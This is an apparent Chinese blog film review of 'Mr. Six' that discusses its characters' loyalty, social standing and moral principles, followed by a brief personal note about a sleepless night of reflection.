另外一个场景有人觉得不太合理的地方是张译饰演的城管打了刘桦饰演的以摊煎饼维持生计的灯罩儿一巴掌,六爷出来“摆平了这事儿”,给了张译一巴掌,为什么那么多城管会怕一个地痞。其实这里我要说一下的是,在北京这儿,地痞有自己的一个圈子,如果你得罪他,他会想出各种办法整死你,张译饰演的角色从年纪上看应该不大,而六爷是挨过刀,坐过牢的人,聪明人应该知道“斗”不过他,见好就收。况且六爷也在理是吧。

再一个场景是六爷缺钱,想去找昔日的好哥们洋火儿借钱,但过去一根烟还没抽完,洋火儿有事要办要出门。先说说洋火儿这个角色吧,我觉得他才是一个聪明人,当今时代的北京生意人,知道变通,才会有那么大家公司。六爷开始也玩笑说了洋火儿坑蒙拐骗赚了不少钱,在当今社会下,想通过自己的劳动力来赚钱,实在太难了,(不禁感叹了一番国情!)洋火儿做事也没有不讲昔日感情,知道六爷无事不登三宝殿,从保险柜里拿了几万块钱让六爷应急,没有应急就当给孩子花,洋火儿也没有让六爷还的意思,而且六爷生病洋火儿出了医院所有的开销,洋火儿在里面的角色才是真正的仗义!

说到仗义不得不说许晴饰演的话匣子了,这个与六爷相差十多岁的北京女人开了一家理发店,六爷是个好面儿的人,不轻易开口借钱,话匣子也知道,六爷需要帮忙没有一次不伸手。而且许晴的演技好就好在每次见到六爷的眼神都不一样,对六爷有一种膜拜,当年几个人打几十个人的画面记忆尤新,这并不是一种盲目崇拜,而是在她们那个年底诞生的英雄主义。不是钱来权来衡量的。六爷需要用钱把自己的老本拿出来,生病陪伴等等,这个角色应该是众多男人们的“女神”。

冯小刚饰演的六爷这个角色,我觉得六爷是个失败者,不会变通,这让我想起了电影《中国合伙人》中的成冬青的那句话“如果不能改变世界,也不被世界改变”。如果一层不变终将被世界淘汰,为什么闷三儿,灯罩儿,以及话匣子能和六爷关系走得近,也验证了一句话“物以类聚,人以群分”,他们是社会的底层,在六爷的朋友里面他们是最差的,再看看洋火儿和其他几个兄弟都是比较成功的。尽管如此,六爷也是一个心地善良的人,遇到别人跳楼没有起哄,而是多了一分担心,还教训起哄的人,从一方面反映了现在这个社会的冰冷。我在想,如果要不是去筹钱的话,我想六爷应该会上去劝说吧!最后的结局六爷应该死了,也必须死,自古“英雄”形象是必须死的,这是自然规律。

喷了吴亦凡和李易峰后,还想为这部片的商业氛围惋惜,最后TFBOY出来漏个脸是什么鬼?完全接不上嘛。露个脸就有无数的脑残粉奋勇而至,要么说中国的傻子多,骗子不够用了呢。

最后我看到了这样一个“段子”,就六爷那个四合院被人砸了,这一锤子下去,要是破坏了整个胡同的风水,万一再坏了老北京的龙脉,丫一南方省长赔得起么。所以一码归一码。

老炮看了三遍,这部电影底蕴很高,可能只有在北京待过的朋友能感受到,还挺想念北京,至少让我懂得了做人必须要有自己的原则,才能有所为,有所不为。

sanxun

彻夜难眠,最近在思考这样一个深刻话题。

有哪些努力是时间无法超越和追赶的?

躺在床上已是凌晨2:00,大概想到了5:00连忙打开电脑记录下了脑仁中的昙花思维。

答案隐藏在标题和图片中。

我想在不久,也许会有两种人会回头来翻这篇毫无意义的文字,我希望是朋友而不是“敌人”!

闭关一阵子吧 !)@$